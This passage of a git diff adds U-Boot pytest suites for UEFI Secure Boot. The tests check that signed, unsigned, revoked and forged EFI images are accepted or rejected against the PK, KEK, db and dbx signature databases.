Case 5a'): + # Test Case 5a, Uninstall PK without correct signature + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'printenv -e -n PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + assert 'PK:' in ''.join(output) + + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 PK_null.esl', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK', + 'printenv -e -n PK']) + assert 'Failed to set EFI variable' in ''.join(output) + assert 'PK:' in ''.join(output) + + with u_boot_console.log.section('Test Case 5b'): + # Test Case 5b, Uninstall PK with correct signature + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 PK_null.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK', + 'printenv -e -n PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + assert '\"PK\" not defined' in ''.join(output) + + output = u_boot_console.run_command( + 'printenv -e SecureBoot') + assert '00000000: 00' in output + output = u_boot_console.run_command( + 'printenv -e SetupMode') + assert '00000000: 01' in output diff --git a/test/py/tests/test_efi_secboot/test_signed.py b/test/py/tests/test_efi_secboot/test_signed.py new file mode 100644 index 00000000000..2f862a259ad --- /dev/null +++ b/test/py/tests/test_efi_secboot/test_signed.py @@ -0,0 +1,371 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2019, Linaro Limited +# Author: AKASHI Takahiro <takahiro.akashi@linaro.org> +# +# U-Boot UEFI: Signed Image Authentication Test + +""" +This test verifies image authentication for signed images. +""" + +import pytest + + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('efi_secure_boot') +@pytest.mark.buildconfigspec('cmd_efidebug') +@pytest.mark.buildconfigspec('cmd_fat') +@pytest.mark.buildconfigspec('cmd_nvedit_efi') +@pytest.mark.slow +class TestEfiSignedImage(object): + def test_efi_signed_image_auth1(self, u_boot_console, efi_boot_env): + """ + Test Case 1 - Secure boot is not in force + """ + u_boot_console.restart_uboot() + disk_img = efi_boot_env + with u_boot_console.log.section('Test Case 1a'): + # Test Case 1a, run signed image if no PK + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % disk_img, + 'efidebug boot add -b 1 HELLO1 host 0:1 /helloworld.efi.signed -s ""', + 'efidebug boot order 1', + 'bootefi bootmgr']) + assert 'Hello, world!' in ''.join(output) + + with u_boot_console.log.section('Test Case 1b'): + # Test Case 1b, run unsigned image if no PK + output = u_boot_console.run_command_list([ + 'efidebug boot add -b 2 HELLO2 host 0:1 /helloworld.efi -s ""', + 'efidebug boot order 2', + 'bootefi bootmgr']) + assert 'Hello, world!' 
in ''.join(output) + + def test_efi_signed_image_auth2(self, u_boot_console, efi_boot_env): + """ + Test Case 2 - Secure boot is in force, + authenticated by db (TEST_db certificate in db) + """ + u_boot_console.restart_uboot() + disk_img = efi_boot_env + with u_boot_console.log.section('Test Case 2a'): + # Test Case 2a, db is not yet installed + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = u_boot_console.run_command_list([ + 'efidebug boot add -b 1 HELLO1 host 0:1 /helloworld.efi.signed -s ""', + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert('\'HELLO1\' failed' in ''.join(output)) + assert('efi_start_image() returned: 26' in ''.join(output)) + output = u_boot_console.run_command_list([ + 'efidebug boot add -b 2 HELLO2 host 0:1 /helloworld.efi -s ""', + 'efidebug boot order 2', + 'efidebug test bootmgr']) + assert '\'HELLO2\' failed' in ''.join(output) + assert 'efi_start_image() returned: 26' in ''.join(output) + + with u_boot_console.log.section('Test Case 2b'): + # Test Case 2b, authenticated by db + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = u_boot_console.run_command_list([ + 'efidebug boot order 2', + 'efidebug test bootmgr']) + assert '\'HELLO2\' failed' in ''.join(output) + assert 'efi_start_image() returned: 26' in ''.join(output) + output = u_boot_console.run_command_list([ + 'efidebug boot order 1', + 'bootefi bootmgr']) + assert 'Hello, world!' 
in ''.join(output) + + def test_efi_signed_image_auth3(self, u_boot_console, efi_boot_env): + """ + Test Case 3 - rejected by dbx (TEST_db certificate in dbx) + """ + u_boot_console.restart_uboot() + disk_img = efi_boot_env + with u_boot_console.log.section('Test Case 3a'): + # Test Case 3a, rejected by dbx + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize dbx', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = u_boot_console.run_command_list([ + 'efidebug boot add -b 1 HELLO host 0:1 /helloworld.efi.signed -s ""', + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO\' failed' in ''.join(output) + assert 'efi_start_image() returned: 26' in ''.join(output) + + with u_boot_console.log.section('Test Case 3b'): + # Test Case 3b, rejected by dbx even if db allows + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = u_boot_console.run_command_list([ + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO\' failed' in ''.join(output) + assert 'efi_start_image() returned: 26' in ''.join(output) + + def test_efi_signed_image_auth4(self, u_boot_console, efi_boot_env): + """ + Test Case 4 - revoked by dbx (digest of TEST_db certificate in dbx) + """ + u_boot_console.restart_uboot() + disk_img = efi_boot_env + with u_boot_console.log.section('Test Case 4'): + # Test Case 4, rejected by dbx + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 dbx_hash.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize dbx', + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = u_boot_console.run_command_list([ + 'efidebug boot add -b 1 HELLO host 0:1 /helloworld.efi.signed -s ""', + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO\' failed' in ''.join(output) + assert 'efi_start_image() returned: 26' in ''.join(output) + + def test_efi_signed_image_auth5(self, u_boot_console, efi_boot_env): + """ + Test Case 5 - multiple signatures + one signed with TEST_db, and + one signed with TEST_db1 + """ + u_boot_console.restart_uboot() + disk_img = efi_boot_env + with u_boot_console.log.section('Test Case 5a'): + # Test Case 5a, authenticated even if only one of signatures + # is verified + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = u_boot_console.run_command_list([ + 'efidebug boot add -b 1 HELLO host 0:1 /helloworld.efi.signed_2sigs -s ""', + 'efidebug boot order 1', 
+ 'efidebug test bootmgr']) + assert 'Hello, world!' in ''.join(output) + + with u_boot_console.log.section('Test Case 5b'): + # Test Case 5b, authenticated if both signatures are verified + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 db1.auth', + 'setenv -e -nv -bs -rt -at -a -i 4000000:$filesize db']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = u_boot_console.run_command_list([ + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert 'Hello, world!' in ''.join(output) + + with u_boot_console.log.section('Test Case 5c'): + # Test Case 5c, rejected if one of signatures (digest of + # certificate) is revoked + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 dbx_hash.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize dbx']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = u_boot_console.run_command_list([ + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO\' failed' in ''.join(output) + assert 'efi_start_image() returned: 26' in ''.join(output) + + with u_boot_console.log.section('Test Case 5d'): + # Test Case 5d, rejected if both of signatures are revoked + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 dbx_hash1.auth', + 'setenv -e -nv -bs -rt -at -a -i 4000000:$filesize dbx']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = u_boot_console.run_command_list([ + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO\' failed' in ''.join(output) + assert 'efi_start_image() returned: 26' in ''.join(output) + + # Try rejection in reverse order. + u_boot_console.restart_uboot() + with u_boot_console.log.section('Test Case 5e'): + # Test Case 5e, authenticated even if only one of signatures + # is verified. 
Same as before but reject dbx_hash1.auth only + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK', + 'fatload host 0:1 4000000 db1.auth', + 'setenv -e -nv -bs -rt -at -a -i 4000000:$filesize db', + 'fatload host 0:1 4000000 dbx_hash1.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize dbx']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = u_boot_console.run_command_list([ + 'efidebug boot add -b 1 HELLO host 0:1 /helloworld.efi.signed_2sigs -s ""', + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO\' failed' in ''.join(output) + assert 'efi_start_image() returned: 26' in ''.join(output) + + def test_efi_signed_image_auth6(self, u_boot_console, efi_boot_env): + """ + Test Case 6 - using digest of signed image in database + """ + u_boot_console.restart_uboot() + disk_img = efi_boot_env + with u_boot_console.log.section('Test Case 6a'): + # Test Case 6a, verified by image's digest in db + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 db_hello_signed.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = u_boot_console.run_command_list([ + 'efidebug boot add -b 1 HELLO host 0:1 /helloworld.efi.signed -s ""', + 'efidebug boot order 1', + 'bootefi bootmgr']) + assert 'Hello, world!' 
in ''.join(output) + + with u_boot_console.log.section('Test Case 6b'): + # Test Case 6b, rejected by TEST_db certificate in dbx + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 dbx_db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize dbx']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = u_boot_console.run_command_list([ + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO\' failed' in ''.join(output) + assert 'efi_start_image() returned: 26' in ''.join(output) + + with u_boot_console.log.section('Test Case 6c'): + # Test Case 6c, rejected by image's digest in dbx + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'fatload host 0:1 4000000 dbx_hello_signed.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize dbx']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = u_boot_console.run_command_list([ + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO\' failed' in ''.join(output) + assert 'efi_start_image() returned: 26' in ''.join(output) + + def test_efi_signed_image_auth7(self, u_boot_console, efi_boot_env): + """ + Test Case 7 - Reject images based on the sha384/512 of their x509 cert + """ + # sha384 of an x509 cert in dbx + u_boot_console.restart_uboot() + disk_img = efi_boot_env + with u_boot_console.log.section('Test Case 7a'): + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK', + 'fatload host 0:1 4000000 db1.auth', + 'setenv -e -nv -bs -rt -at -a -i 4000000:$filesize db', + 'fatload host 0:1 4000000 dbx_hash384.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize dbx']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = u_boot_console.run_command_list([ + 'efidebug boot add -b 1 HELLO host 0:1 /helloworld.efi.signed_2sigs -s ""', + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO\' failed' in ''.join(output) + assert 'efi_start_image() returned: 26' in ''.join(output) + + # sha512 of an x509 cert in dbx + u_boot_console.restart_uboot() + with u_boot_console.log.section('Test Case 7b'): + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK', + 'fatload host 0:1 4000000 db1.auth', + 'setenv -e -nv -bs -rt -at -a -i 4000000:$filesize db', + 'fatload host 0:1 4000000 dbx_hash512.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize dbx']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = u_boot_console.run_command_list([ + 'efidebug boot add -b 1 HELLO host 0:1 /helloworld.efi.signed_2sigs -s ""', + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO\' failed' in ''.join(output) + assert 'efi_start_image() returned: 26' in ''.join(output) + + def test_efi_signed_image_auth8(self, u_boot_console, efi_boot_env): + """ + Test Case 8 - Secure boot is in force, + Same as Test Case 2 but the image 
binary to be loaded + was willfully modified (forged) + Must be rejected. + """ + u_boot_console.restart_uboot() + disk_img = efi_boot_env + with u_boot_console.log.section('Test Case 8a'): + # Test Case 8a, Secure boot is not yet forced + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % disk_img, + 'efidebug boot add -b 1 HELLO1 host 0:1 /helloworld_forged.efi.signed -s ""', + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert('hELLO, world!' in ''.join(output)) + + with u_boot_console.log.section('Test Case 8b'): + # Test Case 8b, Install signature database and verify the image + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = u_boot_console.run_command_list([ + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert(not 'hELLO, world!' in ''.join(output)) + assert('\'HELLO1\' failed' in ''.join(output)) + assert('efi_start_image() returned: 26' in ''.join(output)) diff --git a/test/py/tests/test_efi_secboot/test_signed_intca.py b/test/py/tests/test_efi_secboot/test_signed_intca.py new file mode 100644 index 00000000000..8d9a5f3e7fe --- /dev/null +++ b/test/py/tests/test_efi_secboot/test_signed_intca.py @@ -0,0 +1,135 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2020, Linaro Limited +# Author: AKASHI Takahiro <takahiro.akashi@linaro.org> +# +# U-Boot UEFI: Image Authentication Test (signature with certificates chain) + +""" +This test verifies image authentication for a signed image which is signed +by user certificate and contains additional intermediate certificates in its +signature. +""" + +import pytest + + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('efi_secure_boot') +@pytest.mark.buildconfigspec('cmd_efidebug') +@pytest.mark.buildconfigspec('cmd_fat') +@pytest.mark.buildconfigspec('cmd_nvedit_efi') +@pytest.mark.slow +class TestEfiSignedImageIntca(object): + def test_efi_signed_image_intca1(self, u_boot_console, efi_boot_env_intca): + """ + Test Case 1 - authenticated by root CA in db + """ + u_boot_console.restart_uboot() + disk_img = efi_boot_env_intca + with u_boot_console.log.section('Test Case 1a'): + # Test Case 1a, with no Int CA and not authenticated by root CA + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 db_c.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + + output = u_boot_console.run_command_list([ + 'efidebug boot add -b 1 HELLO_a host 0:1 /helloworld.efi.signed_a -s ""', + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO_a\' failed' in ''.join(output) + assert 'efi_start_image() returned: 26' in ''.join(output) + + with u_boot_console.log.section('Test Case 1b'): + # Test Case 1b, signed and authenticated by root CA + output = u_boot_console.run_command_list([ + 'efidebug boot add -b 2 HELLO_ab host 0:1 /helloworld.efi.signed_ab -s ""', + 'efidebug boot order 2', + 'bootefi bootmgr']) + assert 'Hello, world!' 
in ''.join(output) + + def test_efi_signed_image_intca2(self, u_boot_console, efi_boot_env_intca): + """ + Test Case 2 - authenticated by root CA in db + """ + u_boot_console.restart_uboot() + disk_img = efi_boot_env_intca + with u_boot_console.log.section('Test Case 2a'): + # Test Case 2a, unsigned and not authenticated by root CA + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + + output = u_boot_console.run_command_list([ + 'efidebug boot add -b 1 HELLO_abc host 0:1 /helloworld.efi.signed_abc -s ""', + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO_abc\' failed' in ''.join(output) + assert 'efi_start_image() returned: 26' in ''.join(output) + + with u_boot_console.log.section('Test Case 2b'): + # Test Case 2b, signed and authenticated by root CA + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 db_b.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO_abc\' failed' in ''.join(output) + assert 'efi_start_image() returned: 26' in ''.join(output) + + with u_boot_console.log.section('Test Case 2c'): + # Test Case 2c, signed and authenticated by root CA + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 db_c.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert 'Hello, world!' in ''.join(output) + + def test_efi_signed_image_intca3(self, u_boot_console, efi_boot_env_intca): + """ + Test Case 3 - revoked by dbx + """ + u_boot_console.restart_uboot() + disk_img = efi_boot_env_intca + with u_boot_console.log.section('Test Case 3a'): + # Test Case 3a, revoked by int CA in dbx + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 dbx_b.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize dbx', + 'fatload host 0:1 4000000 db_c.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + + output = u_boot_console.run_command_list([ + 'efidebug boot add -b 1 HELLO_abc host 0:1 /helloworld.efi.signed_abc -s ""', + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert 'Hello, world!' 
in ''.join(output) + # Or, + # assert '\'HELLO_abc\' failed' in ''.join(output) + # assert 'efi_start_image() returned: 26' in ''.join(output) + + with u_boot_console.log.section('Test Case 3b'): + # Test Case 3b, revoked by root CA in dbx + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 dbx_c.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize dbx', + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO_abc\' failed' in ''.join(output) + assert 'efi_start_image() returned: 26' in ''.join(output) diff --git a/test/py/tests/test_efi_secboot/test_unsigned.py b/test/py/tests/test_efi_secboot/test_unsigned.py new file mode 100644 index 00000000000..7c078f220d0 --- /dev/null +++ b/test/py/tests/test_efi_secboot/test_unsigned.py @@ -0,0 +1,117 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2019, Linaro Limited +# Author: AKASHI Takahiro <takahiro.akashi@linaro.org> +# +# U-Boot UEFI: Signed Image Authentication Test + +""" +This test verifies image authentication for unsigned images. +""" + +import pytest + + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('efi_secure_boot') +@pytest.mark.buildconfigspec('cmd_efidebug') +@pytest.mark.buildconfigspec('cmd_fat') +@pytest.mark.buildconfigspec('cmd_nvedit_efi') +@pytest.mark.slow +class TestEfiUnsignedImage(object): + def test_efi_unsigned_image_auth1(self, u_boot_console, efi_boot_env): + """ + Test Case 1 - rejected when not digest in db or dbx + """ + u_boot_console.restart_uboot() + disk_img = efi_boot_env + with u_boot_console.log.section('Test Case 1'): + # Test Case 1 + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + + output = u_boot_console.run_command_list([ + 'efidebug boot add -b 1 HELLO host 0:1 /helloworld.efi -s ""', + 'efidebug boot order 1', + 'bootefi bootmgr']) + assert '\'HELLO\' failed' in ''.join(output) + output = u_boot_console.run_command_list([ + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert 'efi_start_image() returned: 26' in ''.join(output) + assert 'Hello, world!' not in ''.join(output) + + def test_efi_unsigned_image_auth2(self, u_boot_console, efi_boot_env): + """ + Test Case 2 - authenticated by digest in db + """ + u_boot_console.restart_uboot() + disk_img = efi_boot_env + with u_boot_console.log.section('Test Case 2'): + # Test Case 2 + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 db_hello.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + + output = u_boot_console.run_command_list([ + 'efidebug boot add -b 1 HELLO host 0:1 /helloworld.efi -s ""', + 'efidebug boot order 1', + 'bootefi bootmgr']) + assert 'Hello, world!' 
in ''.join(output) + + def test_efi_unsigned_image_auth3(self, u_boot_console, efi_boot_env): + """ + Test Case 3 - rejected by digest in dbx + """ + u_boot_console.restart_uboot() + disk_img = efi_boot_env + with u_boot_console.log.section('Test Case 3a'): + # Test Case 3a, rejected by dbx + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 db_hello.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize dbx', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + + output = u_boot_console.run_command_list([ + 'efidebug boot add -b 1 HELLO host 0:1 /helloworld.efi -s ""', + 'efidebug boot order 1', + 'bootefi bootmgr']) + assert '\'HELLO\' failed' in ''.join(output) + output = u_boot_console.run_command_list([ + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert 'efi_start_image() returned: 26' in ''.join(output) + assert 'Hello, world!' not in ''.join(output) + + with u_boot_console.log.section('Test Case 3b'): + # Test Case 3b, rejected by dbx even if db allows + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 db_hello.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db']) + assert 'Failed to set EFI variable' not in ''.join(output) + + output = u_boot_console.run_command_list([ + 'efidebug boot add -b 1 HELLO host 0:1 /helloworld.efi -s ""', + 'efidebug boot order 1', + 'bootefi bootmgr']) + assert '\'HELLO\' failed' in ''.join(output) + output = u_boot_console.run_command_list([ + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert 'efi_start_image() returned: 26' in ''.join(output) + assert 'Hello, world!' not in ''.join(output) diff --git a/test/py/tests/test_efi_selftest.py b/test/py/tests/test_efi_selftest.py new file mode 100644 index 00000000000..43f24245582 --- /dev/null +++ b/test/py/tests/test_efi_selftest.py @@ -0,0 +1,197 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2017, Heinrich Schuchardt <xypron.glpk@gmx.de> + +""" Test UEFI API implementation +""" + +import pytest + +@pytest.mark.buildconfigspec('cmd_bootefi_selftest') +def test_efi_selftest_base(u_boot_console): + """Run UEFI unit tests + + u_boot_console -- U-Boot console + + This function executes all selftests that are not marked as on request. + """ + u_boot_console.run_command(cmd='setenv efi_selftest') + u_boot_console.run_command(cmd='bootefi selftest', wait_for_prompt=False) + if u_boot_console.p.expect(['Summary: 0 failures', 'Press any key']): + raise Exception('Failures occurred during the EFI selftest') + u_boot_console.restart_uboot() + +@pytest.mark.buildconfigspec('cmd_bootefi_selftest') +@pytest.mark.buildconfigspec('hush_parser') +@pytest.mark.buildconfigspec('of_control') +@pytest.mark.notbuildconfigspec('generate_acpi_table') +def test_efi_selftest_device_tree(u_boot_console): + """Test the device tree support in the UEFI sub-system + + u_boot_console -- U-Boot console + + This test executes the UEFI unit test by calling 'bootefi selftest'. + """ + u_boot_console.run_command(cmd='setenv efi_selftest list') + output = u_boot_console.run_command('bootefi selftest') + assert '\'device tree\'' in output + u_boot_console.run_command(cmd='setenv efi_selftest device tree') + # Set serial# if it is not already set. 
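+    # "${serial#}x" expands the serial# variable with an 'x' appended so an
+    # empty or unset value can be detected; if the result is just 'x', the
+    # variable is initialized to 0. The selftest then expects a serial-number
+    # property in the device tree populated from this variable.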
+ u_boot_console.run_command(cmd='setenv efi_test "${serial#}x"') + u_boot_console.run_command(cmd='test "${efi_test}" = x && setenv serial# 0') + u_boot_console.run_command(cmd='bootefi selftest ${fdtcontroladdr}', wait_for_prompt=False) + if u_boot_console.p.expect(['serial-number:', 'U-Boot']): + raise Exception('serial-number missing in device tree') + u_boot_console.restart_uboot() + +@pytest.mark.buildconfigspec('cmd_bootefi_selftest') +def test_efi_selftest_watchdog_reboot(u_boot_console): + """Test the watchdog timer + + u_boot_console -- U-Boot console + + This function executes the 'watchdog reboot' unit test. + """ + u_boot_console.run_command(cmd='setenv efi_selftest list') + output = u_boot_console.run_command('bootefi selftest') + assert '\'watchdog reboot\'' in output + u_boot_console.run_command(cmd='setenv efi_selftest watchdog reboot') + u_boot_console.run_command(cmd='bootefi selftest', wait_for_prompt=False) + if u_boot_console.p.expect(['resetting', 'U-Boot']): + raise Exception('Reset failed in \'watchdog reboot\' test') + u_boot_console.restart_uboot() + +@pytest.mark.buildconfigspec('cmd_bootefi_selftest') +def test_efi_selftest_text_input(u_boot_console): + """Test the EFI_SIMPLE_TEXT_INPUT_PROTOCOL + + u_boot_console -- U-Boot console + + This function calls the text input EFI selftest. + """ + u_boot_console.run_command(cmd='setenv efi_selftest text input') + u_boot_console.run_command(cmd='bootefi selftest', wait_for_prompt=False) + if u_boot_console.p.expect([r'To terminate type \'x\'']): + raise Exception('No prompt for \'text input\' test') + u_boot_console.drain_console() + # EOT + u_boot_console.run_command(cmd=chr(4), wait_for_echo=False, + send_nl=False, wait_for_prompt=False) + if u_boot_console.p.expect([r'Unicode char 4 \(unknown\), scan code 0 \(Null\)']): + raise Exception('EOT failed in \'text input\' test') + u_boot_console.drain_console() + # BS + u_boot_console.run_command(cmd=chr(8), 